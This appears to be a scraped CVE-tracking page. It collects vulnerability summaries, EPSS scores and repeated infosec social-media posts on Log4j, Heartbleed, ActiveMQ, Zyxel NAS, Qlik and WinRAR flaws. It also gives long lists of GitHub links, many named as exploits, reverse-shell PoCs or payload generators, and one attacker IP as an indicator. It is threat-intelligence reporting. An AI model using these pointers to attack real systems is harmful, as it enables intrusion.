💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

screaminggoat at 2024-05-04T01:53:21.972Z ##

MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!

##

screaminggoat@infosec.exchange at 2024-05-04T01:53:21.000Z ##

MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!

#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK

##

screaminggoat at 2024-05-04T01:53:21.972Z ##

MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!

##

screaminggoat@infosec.exchange at 2024-05-04T01:53:21.000Z ##

MITRE: Technical Deep Dive: Understanding the Anatomy of a Cyber Intrusion
Two weeks ago, MITRE announced that they were breached by a nation-state actor. BLUF is that the indicators overlap with Mandiant's UNC5221, a "China-nexus espionage threat actor". MITRE provides technical details of the intrusion, including timeline, a newly identified BEEFLUSH web shell, more details on BUSHWALK web shell, and the threat actor’s tactics, techniques, and procedures. The IOC are broken up into several sections. And it wouldn't be MITRE without mapping out the ATT&CK TTPs!

#UNC5221 #MITRE #DFIR #threatintel #IOC #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #cyberespionage #MITREATTACK

##

CVE-2021-26887
(7.8 HIGH)

EPSS: 0.06%

updated 2023-12-29T20:15:55.393000

2 posts

An elevation of privilege vulnerability exists in Microsoft Windows when Folder redirection has been enabled via Group Policy. When folder redirection file server is co-located with Terminal server, an attacker who successfully exploited the vulnerability would be able to begin redirecting another user's personal data to a created folder.

To exploit the vulnerability, an attacker can cre

oversecurity@mastodon.social at 2024-04-29T16:10:04.000Z ##

Group Policy Folder Redirection CVE-2021-26887

Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...

🔗️ [Decoder] link.is.it/bp55iz

##

oversecurity@mastodon.social at 2024-04-29T16:10:04.000Z ##

Group Policy Folder Redirection CVE-2021-26887

Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...

🔗️ [Decoder] link.is.it/bp55iz

##

CVE-2023-6448
(9.8 CRITICAL)

EPSS: 6.84%

updated 2023-12-19T15:30:29

2 posts

Unitronics Vision Series PLCs and HMIs use default administrative passwords. An unauthenticated attacker with network access to a PLC or HMI can take administrative control of the system.

screaminggoat at 2024-05-01T13:40:41.063Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

##

screaminggoat@infosec.exchange at 2024-05-01T13:40:41.000Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

#CveCrowdDeny

##

CVE-2023-48365
(9.6 CRITICAL)

EPSS: 0.08%

updated 2023-12-08T05:05:23

2 posts

Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 P

screaminggoat at 2024-04-26T14:59:18.789Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

##

screaminggoat@infosec.exchange at 2024-04-26T14:59:18.000Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel

##

CVE-2023-4474
(9.8 CRITICAL)

EPSS: 0.10%

updated 2023-12-06T02:15:07.187000

5 posts

The improper neutralization of special elements in the WSGI server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.

screaminggoat at 2024-04-30T16:30:48.737Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

##

screaminggoat@infosec.exchange at 2024-04-30T16:30:48.000Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC

##

threatcodex at 2024-04-30T17:01:54.736Z ##

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
-2023-4473 -2023-4474
isc.sans.edu/diary/rss/30884

##

sans_isc at 2024-04-30T15:21:19.190Z ##

Another Day, Another NAS: Attacks against devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

sans_isc@infosec.exchange at 2024-04-30T15:21:19.000Z ##

Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

CVE-2023-4473
(9.8 CRITICAL)

EPSS: 0.07%

updated 2023-12-06T02:15:07.063000

5 posts

A command injection vulnerability in the web server of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.

screaminggoat at 2024-04-30T16:30:48.737Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

##

screaminggoat@infosec.exchange at 2024-04-30T16:30:48.000Z ##

SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.

#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC

##

threatcodex at 2024-04-30T17:01:54.736Z ##

Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
-2023-4473 -2023-4474
isc.sans.edu/diary/rss/30884

##

sans_isc at 2024-04-30T15:21:19.190Z ##

Another Day, Another NAS: Attacks against devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

sans_isc@infosec.exchange at 2024-04-30T15:21:19.000Z ##

Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 i5c.us/d30884

##

CVE-2023-46604
(10.0 CRITICAL)

EPSS: 97.27%

updated 2023-11-28T22:24:39

2 posts

Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.  Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.

Nuclei template

26 repos

https://github.com/vulncheck-oss/cve-2023-46604

https://github.com/NKeshawarz/CVE-2023-46604-RCE

https://github.com/dcm2406/CVE-2023-46604

https://github.com/evkl1d/CVE-2023-46604

https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit

https://github.com/vjayant93/CVE-2023-46604-POC

https://github.com/Mudoleto/Broker_ApacheMQ

https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604

https://github.com/mrpentst/CVE-2023-46604

https://github.com/Anekant-Singhai/Exploits

https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up

https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max

https://github.com/nitzanoligo/CVE-2023-46604-demo

https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp

https://github.com/dcm2406/CVE-Lab

https://github.com/thinkycx/activemq-rce-cve-2023-46604

https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence

https://github.com/sule01u/CVE-2023-46604

https://github.com/hh-hunter/cve-2023-46604

https://github.com/trganda/ActiveMQ-RCE

https://github.com/X1r0z/ActiveMQ-RCE

https://github.com/ph-hitachi/CVE-2023-46604

https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604

https://github.com/ST3G4N05/ExploitScript-CVE-2023-46604

screaminggoat at 2024-05-03T14:21:32.468Z ##

Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)

See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114

Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.

##

screaminggoat@infosec.exchange at 2024-05-03T14:21:32.000Z ##

Apache ActiveMQ security advisory: CVE-2024-32114 - Jolokia and REST API were not secured with default configuration
CVE-2024-32114 (8.5 high) Insecure Default Initialization of Resource (Jolokia JMX REST API and the Message REST API). A malicious actor could interact with the broker using Jolokia JMX REST API, or produce/consume messages or purge/delete destinations using the Message REST API. The impact of CVE-2024-32114 is unauthorized data access, data loss, or service disruption, severely compromising the application’s integrity and availability. Fixed in Apache ActiveMQ 6.1.2. Mitigation is to update the default conf/jetty.xml configuration file to add authentication requirement (see advisory for details)

See SOCRadar blog post New High-Severity Vulnerability in Apache ActiveMQ Poses Risk of Unauthorized Access: CVE-2024-32114

Why you should care about CVE-2024-32114:
A previous Apache ActiveMQ vulnerability CVE-2023-46604 (rated 10.0 maximum severity, disclosed 27 October 2023 by Apache) was exploited almost immediately and added to CISA's KEV Catalog on 02 November 2024 (within 5 days). It is known to be exploited by ransomware groups.

#CVE_2024_32114 #Apache #ActiveMQ #Vulnerability

##

CVE-2023-36396
(7.8 HIGH)

EPSS: 0.11%

updated 2023-11-20T18:04:21.453000

2 posts

Windows Compressed Folder Remote Code Execution Vulnerability

screaminggoat at 2024-04-22T13:54:40.550Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

##

simontsui@infosec.exchange at 2024-04-22T13:54:40.000Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

#MagicDot #CVE_2023_42757 #CVE_2023_32054 #CVE_2023_36396

##

CVE-2021-44228
(10.0 CRITICAL)

EPSS: 97.56%

updated 2023-11-07T03:39:36.897000

2 posts

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is en

Nuclei template

100 repos

https://github.com/logpresso/CVE-2021-44228-Scanner

https://github.com/yahoo/check-log4j

https://github.com/momos1337/Log4j-RCE

https://github.com/julian911015/Log4j-Scanner-Exploit

https://github.com/christophetd/log4shell-vulnerable-app

https://github.com/corretto/hotpatch-for-apache-log4j2

https://github.com/dtact/divd-2021-00038--log4j-scanner

https://github.com/mufeedvh/log4jail

https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228

https://github.com/sassoftware/loguccino

https://github.com/NS-Sp4ce/Vm4J

https://github.com/simonis/Log4jPatch

https://github.com/fireeye/CVE-2021-44228

https://github.com/LiveOverflow/log4shell

https://github.com/infiniroot/nginx-mitigate-log4shell

https://github.com/BinaryDefense/log4j-honeypot-flask

https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab

https://github.com/puzzlepeaches/Log4jUnifi

https://github.com/Diverto/nse-log4shell

https://github.com/takito1812/log4j-detect

https://github.com/corelight/cve-2021-44228

https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads

https://github.com/HynekPetrak/log4shell-finder

https://github.com/CreeperHost/Log4jPatcher

https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent

https://github.com/Jeromeyoung/log4j2burpscanner

https://github.com/greymd/CVE-2021-44228

https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch

https://github.com/Adikso/minecraft-log4j-honeypot

https://github.com/CERTCC/CVE-2021-44228_scanner

https://github.com/Nanitor/log4fix

https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

https://github.com/pedrohavay/exploit-CVE-2021-44228

https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit

https://github.com/darkarnium/Log4j-CVE-Detect

https://github.com/shamo0/CVE-2021-44228

https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs

https://github.com/alexbakker/log4shell-tools

https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector

https://github.com/stripe/log4j-remediation-tools

https://github.com/toramanemre/log4j-rce-detect-waf-bypass

https://github.com/wortell/log4j

https://github.com/bigsizeme/Log4j-check

https://github.com/puzzlepeaches/Log4jHorizon

https://github.com/0xInfection/LogMePwn

https://github.com/alexandre-lavoie/python-log4rce

https://github.com/kubearmor/log4j-CVE-2021-44228

https://github.com/fullhunt/log4j-scan

https://github.com/cisagov/log4j-scanner

https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept

https://github.com/f0ng/log4j2burpscanner

https://github.com/boundaryx/cloudrasp-log4j2

https://github.com/mzlogin/CVE-2021-44228-Demo

https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes

https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228

https://github.com/nccgroup/log4j-jndi-be-gone

https://github.com/phoswald/sample-ldap-exploit

https://github.com/KosmX/CVE-2021-44228-example

https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228

https://github.com/NorthwaveSecurity/log4jcheck

https://github.com/justakazh/Log4j-CVE-2021-44228

https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes

https://github.com/kozmer/log4j-shell-poc

https://github.com/thomaspatzke/Log4Pot

https://github.com/MalwareTech/Log4jTools

https://github.com/thecyberneh/Log4j-RCE-Exploiter

https://github.com/future-client/CVE-2021-44228

https://github.com/0xst4n/CVE-2021-44228-poc

https://github.com/fox-it/log4j-finder

https://github.com/DragonSurvivalEU/RCE

https://github.com/qingtengyun/cve-2021-44228-qingteng-patch

https://github.com/jas502n/Log4j2-CVE-2021-44228

https://github.com/NCSC-NL/log4shell

https://github.com/mr-vill4in/log4j-fuzzer

https://github.com/lfama/log4j_checker

https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator

https://github.com/ssl/scan4log4j

https://github.com/marcourbano/CVE-2021-44228

https://github.com/blake-fm/vcenter-log4j

https://github.com/giterlizzi/nmap-log4shell

https://github.com/mergebase/log4j-detector

https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP

https://github.com/redhuntlabs/Log4JHunt

https://github.com/rubo77/log4j_checker_beta

https://github.com/dwisiswant0/look4jar

https://github.com/mr-r3b00t/CVE-2021-44228

https://github.com/lucab85/log4j-cve-2021-44228

https://github.com/hackinghippo/log4shell_ioc_ips

https://github.com/tippexs/nginx-njs-waf-cve2021-44228

https://github.com/claranet/ansible-role-log4shell

https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell

https://github.com/puzzlepeaches/Log4jCenter

https://github.com/JagarYousef/log4j-dork-scanner

https://github.com/AlexandreHeroux/Fix-CVE-2021-44228

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

https://github.com/1lann/log4shelldetect

https://github.com/back2root/log4shell-rex

https://github.com/0xDexter0us/Log4J-Scanner

https://github.com/roxas-tan/CVE-2021-44228

https://github.com/cyberxml/log4j-poc

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2014-0160
(7.5 HIGH)

EPSS: 97.48%

updated 2023-11-07T02:18:10.590000

2 posts

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

65 repos

https://github.com/hybridus/heartbleedscanner

https://github.com/wwwiretap/bleeding_onions

https://github.com/anthophilee/A2SV--SSL-VUL-Scan

https://github.com/isgroup/openmagic

https://github.com/0x90/CVE-2014-0160

https://github.com/GeeksXtreme/ssl-heartbleed.nse

https://github.com/DisK0nn3cT/MaltegoHeartbleed

https://github.com/jdauphant/patch-openssl-CVE-2014-0160

https://github.com/DominikTo/bleed

https://github.com/siddolo/knockbleed

https://github.com/mozilla-services/Heartbleed

https://github.com/BelminD/heartbleed

https://github.com/sammyfung/openssl-heartbleed-fix

https://github.com/iwaffles/heartbleed-test.crx

https://github.com/einaros/heartbleed-tools

https://github.com/zouguangxian/heartbleed

https://github.com/cved-sources/cve-2014-0160

https://github.com/amerine/coronary

https://github.com/Saymeis/HeartBleed

https://github.com/hmlio/vaas-cve-2014-0160

https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed

https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin

https://github.com/roganartu/heartbleedchecker-chrome

https://github.com/pierceoneill/bleeding-heart

https://github.com/yryz/heartbleed.js

https://github.com/rouze-d/heartbleed

https://github.com/ice-security88/CVE-2014-0160

https://github.com/cyphar/heartthreader

https://github.com/a0726h77/heartbleed-test

https://github.com/iSCInc/heartbleed

https://github.com/OffensivePython/HeartLeak

https://github.com/cldme/heartbleed-bug

https://github.com/cheese-hub/heartbleed

https://github.com/xlucas/heartbleed

https://github.com/FiloSottile/Heartbleed

https://github.com/fb1h2s/CVE-2014-0160

https://github.com/takeshixx/ssl-heartbleed.nse

https://github.com/xanas/heartbleed.py

https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang

https://github.com/PinkP4nther/Heartbleed_PoC

https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin

https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC

https://github.com/proactiveRISK/heartbleed-extention

https://github.com/timsonner/cve-2014-0160-heartbleed

https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker

https://github.com/ingochris/heartpatch.us

https://github.com/hreese/heartbleed-dtls

https://github.com/Lekensteyn/pacemaker

https://github.com/GuillermoEscobero/heartbleed

https://github.com/obayesshelton/CVE-2014-0160-Scanner

https://github.com/sensepost/heartbleed-poc

https://github.com/vortextube/ssl_scanner

https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx

https://github.com/indiw0rm/-Heartbleed-

https://github.com/ThanHuuTuan/Heartexploit

https://github.com/mpgn/heartbleed-PoC

https://github.com/titanous/heartbleeder

https://github.com/musalbas/heartbleed-masstest

https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS

https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed

https://github.com/undacmic/heartbleed-proof-of-concept

https://github.com/cbk914/heartbleed-checker

https://github.com/pblittle/aws-suture

https://github.com/GardeniaWhite/fuzzing

https://github.com/idkqh7/heatbleeding

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2020-29583
(9.8 CRITICAL)

EPSS: 96.25%

updated 2023-11-05T05:04:43

2 posts

Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges.

Nuclei template

1 repos

https://github.com/ruppde/scan_CVE-2020-29583

screaminggoat at 2024-05-01T13:40:41.063Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

##

screaminggoat@infosec.exchange at 2024-05-01T13:40:41.000Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

#CveCrowdDeny

##

CVE-2023-38831
(7.8 HIGH)

EPSS: 35.46%

updated 2023-10-23T01:15:07.550000

4 posts

RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the benign file, and the contents of the folder (which may include executable content) are processed during an attempt to acc

43 repos

https://github.com/Mich-ele/CVE-2023-38831-winrar

https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit

https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT

https://github.com/ruycr4ft/CVE-2023-38831

https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE

